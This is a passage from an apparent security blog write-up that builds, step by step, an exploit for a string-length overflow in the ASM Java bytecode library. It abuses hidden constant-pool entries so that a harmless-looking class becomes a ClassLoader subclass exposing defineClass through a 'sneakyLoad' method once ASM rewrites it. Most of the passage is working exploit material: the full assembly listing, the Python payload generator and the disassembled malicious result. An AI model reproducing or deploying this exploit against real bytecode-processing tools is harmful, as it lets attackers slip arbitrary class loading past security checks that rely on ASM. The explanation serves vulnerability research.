It gets worse: In order to make [this_cls] a hidden constant, the constants it points to also need to be at index 257 or higher, which means we need to make another hidden copy for the underlying Utf8 constant (referred to as [this_utf] above).

Even worse, since [this_utf] is now a hidden constant, its own data can’t contain any null bytes either, including the length field of the encoded string data. This means that we have to rename our class to something that is at least 257 bytes long. So bye, bye, Exploit and hello Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx.

Now we have the bytes for our first hidden constant: a tag byte (01), then length field (257 = 0101), then the string data. We’ll use a Python script to construct the actual value of evilstring, so we can just write '010101'.decode('hex') + 'Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'.

Hidden constants part 2

Recall that our code so far looks like this:

        ldc_w "s_fb"
        ldc_w "s_fd"
        ldc_w "s_ff"

        ldc_w "defineClass"
        ldc_w "(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "<init>"
        ldc_w "()V"
        ldc_w "java/lang/ClassLoader"

        ldc_w "evilstring"

The Utf8 for "s_ff" appears at index 00ff, so "defineClass" appears at 0101, "(Ljava/lang/String;[BII..." appears at 0103, "<init>" at 0105, "()V" at 0107, "java/lang/ClassLoader" at 0109 and "evilstring" itself appears at 010B. (Recall that it counts up by two each time because each string literal results in both a Utf8 constant and a String constant.)

However, that’s all according to ASM’s view. ASM thinks that it’s writing out one giant Utf8 constant for evilstring at index 010B, but when it does, the string length overflows to 0, so the JVM continues parsing from inside evilstring, etc. Therefore the JVM sees a 0-length Utf8 constant at index 010B, and thus the first hidden constant we create ([this_utf]) actually appears at index 010C.

With that out of the way, we can proceed to the next hidden constant, [this_cls] itself. This is just a tag byte (07) followed by the index of [this_utf] (010C). In fact, we can now fill in the rest of the hidden constants too. (The tag bytes for Method and NameAndType constants are 0A and 0C respectively.)

.const [this_utf] = Utf8 "Exploit"
010C: 01 0101 ... 

.const [this_cls] = Class [this_utf]
010D: 07 010C

.const [defineClass_nat] = NameAndType [defineClass_utf] [defineClass_desc_utf]
010E: 0C 0101 0103

.const [defineClass_method] = Method [this_cls] [defineClass_nat]
010F: 0A 010D 010E

.const [CL_init_nat] = NameAndType [init_utf] [init_desc_utf]
0110: 0C 0105 0107

.const [CL_init_method] = Method [super_cls] [CL_init_nat]
0111: 0A [super_cls] 0110

There are two things to note here. First, we couldn’t define [super_cls] yet and had to leave it as a placeholder, since the bytecode we wrote previously requires its index to end in 05. Second, [defineClass_utf], [defineClass_desc_utf], etc. are not hidden constants. We defined them previously using ordinary string literal ldcs. However, they are referenced by hidden constants and thus have to appear at index 0101 or higher, which is why we had to add all those dummy strings before them earlier.

This leads to the following Python code to construct the hidden constants we’ve defined so far, where ---- is a placeholder to be filled in with [super_cls] later.

s = '010101'.decode('hex') + 'Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
s += '07010C0C010101030A010D010E0C010501070A----0110'.decode('hex')

Next comes [super_cls]. The next available index that ends in 05 is 0205, but we’re currently at index 0112, so we’ll have to add a bunch of dummy constants again to fill up the space. Luckily, since we’re creating the hidden constants directly rather than going through ASM, we don’t have to worry about duplicates, and can just repeat the same constant over and over. Specifically, we’ll just use the byte pattern 03 01010101, which corresponds to the int constant Int 0x01010101.

s += '0301010101'.decode('hex') * (0x205 - 0x112)

Now we can define [super_cls], which is just 07 0109, and also fill in the earlier placeholders with its index (0205) . This brings us to

s = '010101'.decode('hex') + 'Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
s += '07010C0C010101030A010D010E0C010501070A02050110'.decode('hex')
s += '0301010101'.decode('hex') * (0x205 - 0x112)
s += '070109'.decode('hex')

What next? Recall that the bytecode we wrote earlier had two constraints on the constant pool:

[super_cls] = **05
[sneakyLoad_utf] = 03**

We already solved the first one, but still have to deal with the second. Therefore, we’ll skip ahead to the first compatible index (0300):

s += '0301010101'.decode('hex') * (0x300 - 0x206)

And define [sneakyLoad_utf] there. Note that for the same reasons as before, it needs to be at least 257 bytes long, so we have to rename sneakyLoad to sneakyLoad_______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________.

s += '010101'.decode('hex') + 'sneakyLoad'.ljust(257, '_')

After [sneakyLoad_utf], we add one more instance of the dummy constant 03 01010101, which is a leftover from a previous design while I was recreating this exploit for the blog post and initially made a miscalculation, but taking it out would be far too much hassle, since it would mean recalculating all the offsets, etc.

Finally, it’s time to do some overflowing!

Putting the “evil” in “evilstring”

Now that we’ve set up all the hidden constant pool entries, we need to fill the rest of the string with null bytes in order to actually trigger the overflow bug. Of course, we can’t just put in null bytes; we have to wrap them in a Utf8 constant so the JVM will be happy when parsing the hidden constant pool (recall that ASM will re-encode the null bytes as the proper C0 80 encoding, so the JVM will see the correct MUTF-8 encoding here).

Now, how many null bytes do we need? We want the encoded length of the string to be exactly 65536. So far, we’ve defined 3016 bytes worth of hidden constant pool entries, which combined with the three bytes for the final wrapper Utf8, means we need the rest of the string to have an encoded length of 65536 - 3019 = 62517. That’s an odd number, so we’ll include one non-null byte and 62516//2 = 31258 literal null bytes.

Unicode blues

So we’re done right? Not so far. The problem is that the wrapper Utf8 is part of the hidden constant pool seen by the JVM, which means that its encoded length needs to be the length after ASM converts all the null bytes to the proper encoding. This gives a length of 1 + 31258*2 or F435.

But wait! The hidden constants are all embedded within evilstring, which means they have to be valid MUTF-8 encoded data. We’ve dealt with the main restriction (no null bytes) at length before. However, there’s another restriction - all bytes have to be part of a valid unicode sequence. Luckily, MUTF-8 encodes all bytes 01-7F as themselves, so we can use whatever data we want as long as the bytes are in that range. However, bytes above 7F must be part of multi-byte unicode encodings for non-ASCII characters. This means that F4 byte up there is invalid MUTF-8.

The solution is to use not one but two wrapper Utf8 constants and divide up the null bytes between them so that neither length exceeds 7F7F.

Since we now have an extra three bytes of Utf8 headers, we don’t need the odd non-null byte and can divide up the remaining (65536 - 3022)//2 = 31257 null bytes between the two. Since this isn’t even, we’ll put one more and one less in each, resulting in hex lengths of 7A18 and 7A1A respectively.

s += '017A18'.decode('hex') + '\x00' * (0x7A18 // 2)
s += '017A1A'.decode('hex') + '\x00' * (0x7A1A // 2)

Finishing touches, or math is hard

The first time I recreated this exploit while working on the blog post, I made some minor miscalculations, so I had to adjust the numbers a bit at the end to make it all work.

Recall that the first long constant shown above is ldc2_w 0x------0001------L. That 0001 is the access_flags of the classfile, which means that the three bytes that come before it in the long are actually part of the constant pool.

This means that there’s seven bytes sticking out into the constant pool - the first three bytes of the long constant, its tag byte, and the three bytes of the String constant that ASM creates pointing to the Utf8 for evilstring. Luckily, we can cover this up by adding 7 to the length of the final hidden wrapper Utf8 so it will include those seven bytes:

s += '017A18'.decode('hex') + '\x00' * (0x7A18 // 2)
s += '017A21'.decode('hex') + '\x00' * (0x7A1A // 2)

As for the first three bytes of the long, we can fill them in with anything that is valid MUTF-8 (I chose 333333 below).

One last thing

We added hundreds of hidden constants to (the JVM’s view of) the constant pool, embedded in our evilstring so ASM doesn’t know about them. However, the way the JVM knows when to stop parsing constant pool entries is when it reaches the number specified in the constant pool count field, which appears before the constant pool entries.

This means that the JVM parses a number of constant pool entries equal to the count field written by ASM and thus equal to the number of constant pool entries that ASM knows about. Therefore, the JVM won’t know to continue parsing our hidden constants and instead attempt to parse them as the rest of the classfile rather than as constants and thus crash.

Therefore, we need to adjust the constant pool count as seen by ASM to match that that we want the JVM to see. We can do this by adding the appropriate number of dummy strings after everything else:

        ldc2_w 0x0000000388888800L
        ldc2_w 0x00000E2599999999L

        ; dummy strings added here
        ldc_w "s_134"
        ldc_w "s_136"
        ldc_w "s_138"
        ...
        ldc_w "s_2fe"
        ldc_w "s_300"
        ldc_w "s_302"

Putting it all together

Now, we are finally done writing the exploit class for real. Here is our complete, final code:

.class public Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx
.super java/lang/Object

.method public woodlelyDoodlely : ()I
    .code stack 2000 locals 10
        ldc_w "(Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "Code"
        ldc_w "s_b"
        ldc_w "s_d"
        ldc_w "s_f"
        ldc_w "s_11"
        ldc_w "s_13"
        ldc_w "s_15"
        ldc_w "s_17"
        ldc_w "s_19"
        ldc_w "s_1b"
        ldc_w "s_1d"
        ldc_w "s_1f"
        ldc_w "s_21"
        ldc_w "s_23"
        ldc_w "s_25"
        ldc_w "s_27"
        ldc_w "s_29"
        ldc_w "s_2b"
        ldc_w "s_2d"
        ldc_w "s_2f"
        ldc_w "s_31"
        ldc_w "s_33"
        ldc_w "s_35"
        ldc_w "s_37"
        ldc_w "s_39"
        ldc_w "s_3b"
        ldc_w "s_3d"
        ldc_w "s_3f"
        ldc_w "s_41"
        ldc_w "s_43"
        ldc_w "s_45"
        ldc_w "s_47"
        ldc_w "s_49"
        ldc_w "s_4b"
        ldc_w "s_4d"
        ldc_w "s_4f"
        ldc_w "s_51"
        ldc_w "s_53"
        ldc_w "s_55"
        ldc_w "s_57"
        ldc_w "s_59"
        ldc_w "s_5b"
        ldc_w "s_5d"
        ldc_w "s_5f"
        ldc_w "s_61"
        ldc_w "s_63"
        ldc_w "s_65"
        ldc_w "s_67"
        ldc_w "s_69"
        ldc_w "s_6b"
        ldc_w "s_6d"
        ldc_w "s_6f"
        ldc_w "s_71"
        ldc_w "s_73"
        ldc_w "s_75"
        ldc_w "s_77"
        ldc_w "s_79"
        ldc_w "s_7b"
        ldc_w "s_7d"
        ldc_w "s_7f"
        ldc_w "s_81"
        ldc_w "s_83"
        ldc_w "s_85"
        ldc_w "s_87"
        ldc_w "s_89"
        ldc_w "s_8b"
        ldc_w "s_8d"
        ldc_w "s_8f"
        ldc_w "s_91"
        ldc_w "s_93"
        ldc_w "s_95"
        ldc_w "s_97"
        ldc_w "s_99"
        ldc_w "s_9b"
        ldc_w "s_9d"
        ldc_w "s_9f"
        ldc_w "s_a1"
        ldc_w "s_a3"
        ldc_w "s_a5"
        ldc_w "s_a7"
        ldc_w "s_a9"
        ldc_w "s_ab"
        ldc_w "s_ad"
        ldc_w "s_af"
        ldc_w "s_b1"
        ldc_w "s_b3"
        ldc_w "s_b5"
        ldc_w "s_b7"
        ldc_w "s_b9"
        ldc_w "s_bb"
        ldc_w "s_bd"
        ldc_w "s_bf"
        ldc_w "s_c1"
        ldc_w "s_c3"
        ldc_w "s_c5"
        ldc_w "s_c7"
        ldc_w "s_c9"
        ldc_w "s_cb"
        ldc_w "s_cd"
        ldc_w "s_cf"
        ldc_w "s_d1"
        ldc_w "s_d3"
        ldc_w "s_d5"
        ldc_w "s_d7"
        ldc_w "s_d9"
        ldc_w "s_db"
        ldc_w "s_dd"
        ldc_w "s_df"
        ldc_w "s_e1"
        ldc_w "s_e3"
        ldc_w "s_e5"
        ldc_w "s_e7"
        ldc_w "s_e9"
        ldc_w "s_eb"
        ldc_w "s_ed"
        ldc_w "s_ef"
        ldc_w "s_f1"
        ldc_w "s_f3"
        ldc_w "s_f5"
        ldc_w "s_f7"
        ldc_w "s_f9"
        ldc_w "s_fb"
        ldc_w "s_fd"
        ldc_w "s_ff"

        ldc_w "defineClass"
        ldc_w "(Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class;"
        ldc_w "<init>"
        ldc_w "()V"
        ldc_w "java/lang/ClassLoader"

        ldc_w "evilstring"

        ldc2_w 0x3333330001010d02L
        ldc2_w 0x0000000000020001L
        ldc_w  0x00000700
        ldc2_w 0x00090000001C0042L
        ldc2_w 0x00000000102A2B2CL
        ldc2_w 0x57032CBE2DB6010FL
        ldc2_w 0x57B0000000000000L
        ldc2_w 0x00000003AAAAAA00L
        ldc2_w 0x00000003BBBBBB00L
        ldc2_w 0x00000003CCCCCC00L
        ldc2_w 0x00000006DDDDDDDDL
        ldc2_w 0x0000010105010700L
        ldc2_w 0x00090000001C0043L
        ldc2_w 0x00000000102A0000L
        ldc2_w 0x57B70111B1000000L
        ldc2_w 0x5700000000000000L
        ldc2_w 0x0000000366666600L
        ldc2_w 0x0000000377777700L
        ldc2_w 0x0000000388888800L
        ldc2_w 0x00000E2599999999L


        ldc_w "s_134"
        ldc_w "s_136"
        ldc_w "s_138"
        ldc_w "s_13a"
        ldc_w "s_13c"
        ldc_w "s_13e"
        ldc_w "s_140"
        ldc_w "s_142"
        ldc_w "s_144"
        ldc_w "s_146"
        ldc_w "s_148"
        ldc_w "s_14a"
        ldc_w "s_14c"
        ldc_w "s_14e"
        ldc_w "s_150"
        ldc_w "s_152"
        ldc_w "s_154"
        ldc_w "s_156"
        ldc_w "s_158"
        ldc_w "s_15a"
        ldc_w "s_15c"
        ldc_w "s_15e"
        ldc_w "s_160"
        ldc_w "s_162"
        ldc_w "s_164"
        ldc_w "s_166"
        ldc_w "s_168"
        ldc_w "s_16a"
        ldc_w "s_16c"
        ldc_w "s_16e"
        ldc_w "s_170"
        ldc_w "s_172"
        ldc_w "s_174"
        ldc_w "s_176"
        ldc_w "s_178"
        ldc_w "s_17a"
        ldc_w "s_17c"
        ldc_w "s_17e"
        ldc_w "s_180"
        ldc_w "s_182"
        ldc_w "s_184"
        ldc_w "s_186"
        ldc_w "s_188"
        ldc_w "s_18a"
        ldc_w "s_18c"
        ldc_w "s_18e"
        ldc_w "s_190"
        ldc_w "s_192"
        ldc_w "s_194"
        ldc_w "s_196"
        ldc_w "s_198"
        ldc_w "s_19a"
        ldc_w "s_19c"
        ldc_w "s_19e"
        ldc_w "s_1a0"
        ldc_w "s_1a2"
        ldc_w "s_1a4"
        ldc_w "s_1a6"
        ldc_w "s_1a8"
        ldc_w "s_1aa"
        ldc_w "s_1ac"
        ldc_w "s_1ae"
        ldc_w "s_1b0"
        ldc_w "s_1b2"
        ldc_w "s_1b4"
        ldc_w "s_1b6"
        ldc_w "s_1b8"
        ldc_w "s_1ba"
        ldc_w "s_1bc"
        ldc_w "s_1be"
        ldc_w "s_1c0"
        ldc_w "s_1c2"
        ldc_w "s_1c4"
        ldc_w "s_1c6"
        ldc_w "s_1c8"
        ldc_w "s_1ca"
        ldc_w "s_1cc"
        ldc_w "s_1ce"
        ldc_w "s_1d0"
        ldc_w "s_1d2"
        ldc_w "s_1d4"
        ldc_w "s_1d6"
        ldc_w "s_1d8"
        ldc_w "s_1da"
        ldc_w "s_1dc"
        ldc_w "s_1de"
        ldc_w "s_1e0"
        ldc_w "s_1e2"
        ldc_w "s_1e4"
        ldc_w "s_1e6"
        ldc_w "s_1e8"
        ldc_w "s_1ea"
        ldc_w "s_1ec"
        ldc_w "s_1ee"
        ldc_w "s_1f0"
        ldc_w "s_1f2"
        ldc_w "s_1f4"
        ldc_w "s_1f6"
        ldc_w "s_1f8"
        ldc_w "s_1fa"
        ldc_w "s_1fc"
        ldc_w "s_1fe"
        ldc_w "s_200"
        ldc_w "s_202"
        ldc_w "s_204"
        ldc_w "s_206"
        ldc_w "s_208"
        ldc_w "s_20a"
        ldc_w "s_20c"
        ldc_w "s_20e"
        ldc_w "s_210"
        ldc_w "s_212"
        ldc_w "s_214"
        ldc_w "s_216"
        ldc_w "s_218"
        ldc_w "s_21a"
        ldc_w "s_21c"
        ldc_w "s_21e"
        ldc_w "s_220"
        ldc_w "s_222"
        ldc_w "s_224"
        ldc_w "s_226"
        ldc_w "s_228"
        ldc_w "s_22a"
        ldc_w "s_22c"
        ldc_w "s_22e"
        ldc_w "s_230"
        ldc_w "s_232"
        ldc_w "s_234"
        ldc_w "s_236"
        ldc_w "s_238"
        ldc_w "s_23a"
        ldc_w "s_23c"
        ldc_w "s_23e"
        ldc_w "s_240"
        ldc_w "s_242"
        ldc_w "s_244"
        ldc_w "s_246"
        ldc_w "s_248"
        ldc_w "s_24a"
        ldc_w "s_24c"
        ldc_w "s_24e"
        ldc_w "s_250"
        ldc_w "s_252"
        ldc_w "s_254"
        ldc_w "s_256"
        ldc_w "s_258"
        ldc_w "s_25a"
        ldc_w "s_25c"
        ldc_w "s_25e"
        ldc_w "s_260"
        ldc_w "s_262"
        ldc_w "s_264"
        ldc_w "s_266"
        ldc_w "s_268"
        ldc_w "s_26a"
        ldc_w "s_26c"
        ldc_w "s_26e"
        ldc_w "s_270"
        ldc_w "s_272"
        ldc_w "s_274"
        ldc_w "s_276"
        ldc_w "s_278"
        ldc_w "s_27a"
        ldc_w "s_27c"
        ldc_w "s_27e"
        ldc_w "s_280"
        ldc_w "s_282"
        ldc_w "s_284"
        ldc_w "s_286"
        ldc_w "s_288"
        ldc_w "s_28a"
        ldc_w "s_28c"
        ldc_w "s_28e"
        ldc_w "s_290"
        ldc_w "s_292"
        ldc_w "s_294"
        ldc_w "s_296"
        ldc_w "s_298"
        ldc_w "s_29a"
        ldc_w "s_29c"
        ldc_w "s_29e"
        ldc_w "s_2a0"
        ldc_w "s_2a2"
        ldc_w "s_2a4"
        ldc_w "s_2a6"
        ldc_w "s_2a8"
        ldc_w "s_2aa"
        ldc_w "s_2ac"
        ldc_w "s_2ae"
        ldc_w "s_2b0"
        ldc_w "s_2b2"
        ldc_w "s_2b4"
        ldc_w "s_2b6"
        ldc_w "s_2b8"
        ldc_w "s_2ba"
        ldc_w "s_2bc"
        ldc_w "s_2be"
        ldc_w "s_2c0"
        ldc_w "s_2c2"
        ldc_w "s_2c4"
        ldc_w "s_2c6"
        ldc_w "s_2c8"
        ldc_w "s_2ca"
        ldc_w "s_2cc"
        ldc_w "s_2ce"
        ldc_w "s_2d0"
        ldc_w "s_2d2"
        ldc_w "s_2d4"
        ldc_w "s_2d6"
        ldc_w "s_2d8"
        ldc_w "s_2da"
        ldc_w "s_2dc"
        ldc_w "s_2de"
        ldc_w "s_2e0"
        ldc_w "s_2e2"
        ldc_w "s_2e4"
        ldc_w "s_2e6"
        ldc_w "s_2e8"
        ldc_w "s_2ea"
        ldc_w "s_2ec"
        ldc_w "s_2ee"
        ldc_w "s_2f0"
        ldc_w "s_2f2"
        ldc_w "s_2f4"
        ldc_w "s_2f6"
        ldc_w "s_2f8"
        ldc_w "s_2fa"
        ldc_w "s_2fc"
        ldc_w "s_2fe"
        ldc_w "s_300"
        ldc_w "s_302"

        iconst_0
        ireturn
    .end code
.end method
.end class

Where "evilstring" is replaced with the value generated by this Python script:

s = '010101'.decode('hex') + 'Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx'
s += '07010C0C010101030A010D010E0C010501070A02050110'.decode('hex')
s += '0301010101'.decode('hex') * (0x205 - 0x112)
s += '070109'.decode('hex')
s += '0301010101'.decode('hex') * (0x300 - 0x206)


s += '010101'.decode('hex') + 'sneakyLoad'.ljust(257, '_')

s += '0301010101'.decode('hex')

s += '017A18'.decode('hex') + '\x00' * (0x7A18 // 2)
s += '017A21'.decode('hex') + '\x00' * (0x7A1A // 2)


print len(s), 'bytes'
print len(s.replace('\x00', '\xC0\x80')), 'encoded bytes'
open('evilstring', 'wb').write(s)

We can now assemble this classfile, and run it through ASM with no bytecode transforms to see what happens and disassemble the result. Almost as if by magic, running the classfile through ASM results in a rather different and more sinister classfile on the other side:

.version 49 0 
.class public Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx 
.super java/lang/ClassLoader 

.method public sneakyLoad_______________________________________________________________________________________________________________________________________________________________________________________________________________________________________________________ : (Ljava/lang/String;[BLjava/security/ProtectionDomain;)Ljava/lang/Class; 
    .code stack 66 locals 1280 
L0:     aload_0 
L1:     aload_1 
L2:     aload_2 
L3:     iconst_2 
L4:     pop 
L5:     iconst_0 
L6:     aload_2 
L7:     arraylength 
L8:     aload_3 
L9:     invokevirtual Method Exploit/xxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxxx defineClass (Ljava/lang/String;[BIILjava/security/ProtectionDomain;)Ljava/lang/Class; 
L12:    iconst_2 
L13:    pop 
L14:    areturn 
L15:    nop 
L16:    
    .end code 
    .attribute woodlelyDoodlely b'\xaa\xaa\xaa' 
    .attribute woodlelyDoodlely b'\xbb\xbb\xbb' 
    .attribute woodlelyDoodlely b'\xcc\xcc\xcc' 
    .attribute woodlelyDoodlely b'\xdd\xdd\xdd\xdd\x05\x00' 
.end method 

.method public <init> : ()V 
    .code stack 67 locals 1280 
L0:     aload_0 
L1:     nop 
L2:     nop 
L3:     iconst_2 
L4:     pop 
L5:     invokespecial Method java/lang/ClassLoader <init> ()V 
L8:     return 
L9:     nop 
L10:    nop 
L11:    nop 
L12:    iconst_2 
L13:    pop 
L14:    nop 
L15:    nop 
L16:    
    .end code 
    .attribute woodlelyDoodlely b'fff' 
    .attribute woodlelyDoodlely b'www' 
    .attribute woodlelyDoodlely b'\x88\x88\x88' 
    .attribute woodlelyDoodlely b'\x99\x99\x99\x99\x01\x00\x05s_134\x08\x014\x01\x00\x05s_136\x08\x016\x01\x00\x05s_138\x08\x018\x01\x00\x05s_13a\x08\x01:\x01\x00\x05s_13c\x08\x01<\x01\x00\x05s_13e\x08\x01>\x01\x00\x05s_140\x08\x01@\x01\x00\x05s_142\x08\x01B\x01\x00\x05s_144\x08\x01D\x01\x00\x05s_146\x08\x01F\x01\x00\x05s_148\x08\x01H\x01\x00\x05s_14a\x08\x01J\x01\x00\x05s_14c\x08\x01L\x01\x00\x05s_14e\x08\x01N\x01\x00\x05s_150\x08\x01P\x01\x00\x05s_152\x08\x01R\x01\x00\x05s_154\x08\x01T\x01\x00\x05s_156\x08\x01V\x01\x00\x05s_158\x08\x01X\x01\x00\x05s_15a\x08\x01Z\x01\x00\x05s_15c\x08\x01\\\x01\x00\x05s_15e\x08\x01^\x01\x00\x05s_160\x08\x01`\x01\x00\x05s_162\x08\x01b\x01\x00\x05s_164\x08\x01d\x01\x00\x05s_166\x08\x01f\x01\x00\x05s_168\x08\x01h\x01\x00\x05s_16a\x08\x01j\x01\x00\x05s_16c\x08\x01l\x01\x00\x05s_16e\x08\x01n\x01\x00\x05s_170\x08\x01p\x01\x00\x05s_172\x08\x01r\x01\x00\x05s_174\x08\x01t\x01\x00\x05s_176\x08\x01v\x01\x00\x05s_178\x08\x01x\x01\x00\x05s_17a\x08\x01z\x01\x00\x05s_17c\x08\x01|\x01\x00\x05s_17e\x08\x01~\x01\x00\x05s_180\x08\x01\x80\x01\x00\x05s_182\x08\x01\x82\x01\x00\x05s_184\x08\x01\x84\x01\x00\x05s_186\x08\x01\x86\x01\x00\x05s_188\x08\x01\x88\x01\x00\x05s_18a\x08\x01\x8a\x01\x00\x05s_18c\x08\x01\x8c\x01\x00\x05s_18e\x08\x01\x8e\x01\x00\x05s_190\x08\x01\x90\x01\x00\x05s_192\x08\x01\x92\x01\x00\x05s_194\x08\x01\x94\x01\x00\x05s_196\x08\x01\x96\x01\x00\x05s_198\x08\x01\x98\x01\x00\x05s_19a\x08\x01\x9a\x01\x00\x05s_19c\x08\x01\x9c\x01\x00\x05s_19e\x08\x01\x9e\x01\x00\x05s_1a0\x08\x01\xa0\x01\x00\x05s_1a2\x08\x01\xa2\x01\x00\x05s_1a4\x08\x01\xa4\x01\x00\x05s_1a6\x08\x01\xa6\x01\x00\x05s_1a8\x08\x01\xa8\x01\x00\x05s_1aa\x08\x01\xaa\x01\x00\x05s_1ac\x08\x01\xac\x01\x00\x05s_1ae\x08\x01\xae\x01\x00\x05s_1b0\x08\x01\xb0\x01\x00\x05s_1b2\x08\x01\xb2\x01\x00\x05s_1b4\x08\x01\xb4\x01\x00\x05s_1b6\x08\x01\xb6\x01\x00\x05s_1b8\x08\x01\xb8\x01\x00\x05s_1ba\x08\x01\xba\x01\x00\x05s_1bc\x08\x01\xbc\x01\x00\x05s_1be\x08\x01\xbe\x01\x00\x05s_1c0\x08\x01\xc0\x01\x00\x05s_1c2\x08\x01\xc2\x01\x00\x05s_1c4\x08\x01\xc4\x01\x00\x05s_1c6\x08\x01\xc6\x01\x00\x05s_1c8\x08\x01\xc8\x01\x00\x05s_1ca\x08\x01\xca\x01\x00\x05s_1cc\x08\x01\xcc\x01\x00\x05s_1ce\x08\x01\xce\x01\x00\x05s_1d0\x08\x01\xd0\x01\x00\x05s_1d2\x08\x01\xd2\x01\x00\x05s_1d4\x08\x01\xd4\x01\x00\x05s_1d6\x08\x01\xd6\x01\x00\x05s_1d8\x08\x01\xd8\x01\x00\x05s_1da\x08\x01\xda\x01\x00\x05s_1dc\x08\x01\xdc\x01\x00\x05s_1de\x08\x01\xde\x01\x00\x05s_1e0\x08\x01\xe0\x01\x00\x05s_1e2\x08\x01\xe2\x01\x00\x05s_1e4\x08\x01\xe4\x01\x00\x05s_1e6\x08\x01\xe6\x01\x00\x05s_1e8\x08\x01\xe8\x01\x00\x05s_1ea\x08\x01\xea\x01\x00\x05s_1ec\x08\x01\xec\x01\x00\x05s_1ee\x08\x01\xee\x01\x00\x05s_1f0\x08\x01\xf0\x01\x00\x05s_1f2\x08\x01\xf2\x01\x00\x05s_1f4\x08\x01\xf4\x01\x00\x05s_1f6\x08\x01\xf6\x01\x00\x05s_1f8\x08\x01\xf8\x01\x00\x05s_1fa\x08\x01\xfa\x01\x00\x05s_1fc\x08\x01\xfc\x01\x00\x05s_1fe\x08\x01\xfe\x01\x00\x05s_200\x08\x02\x00\x01\x00\x05s_202\x08\x02\x02\x01\x00\x05s_204\x08\x02\x04\x01\x00\x05s_206\x08\x02\x06\x01\x00\x05s_208\x08\x02\x08\x01\x00\x05s_20a\x08\x02\n\x01\x00\x05s_20c\x08\x02\x0c\x01\x00\x05s_20e\x08\x02\x0e\x01\x00\x05s_210\x08\x02\x10\x01\x00\x05s_212\x08\x02\x12\x01\x00\x05s_214\x08\x02\x14\x01\x00\x05s_216\x08\x02\x16\x01\x00\x05s_218\x08\x02\x18\x01\x00\x05s_21a\x08\x02\x1a\x01\x00\x05s_21c\x08\x02\x1c\x01\x00\x05s_21e\x08\x02\x1e\x01\x00\x05s_220\x08\x02 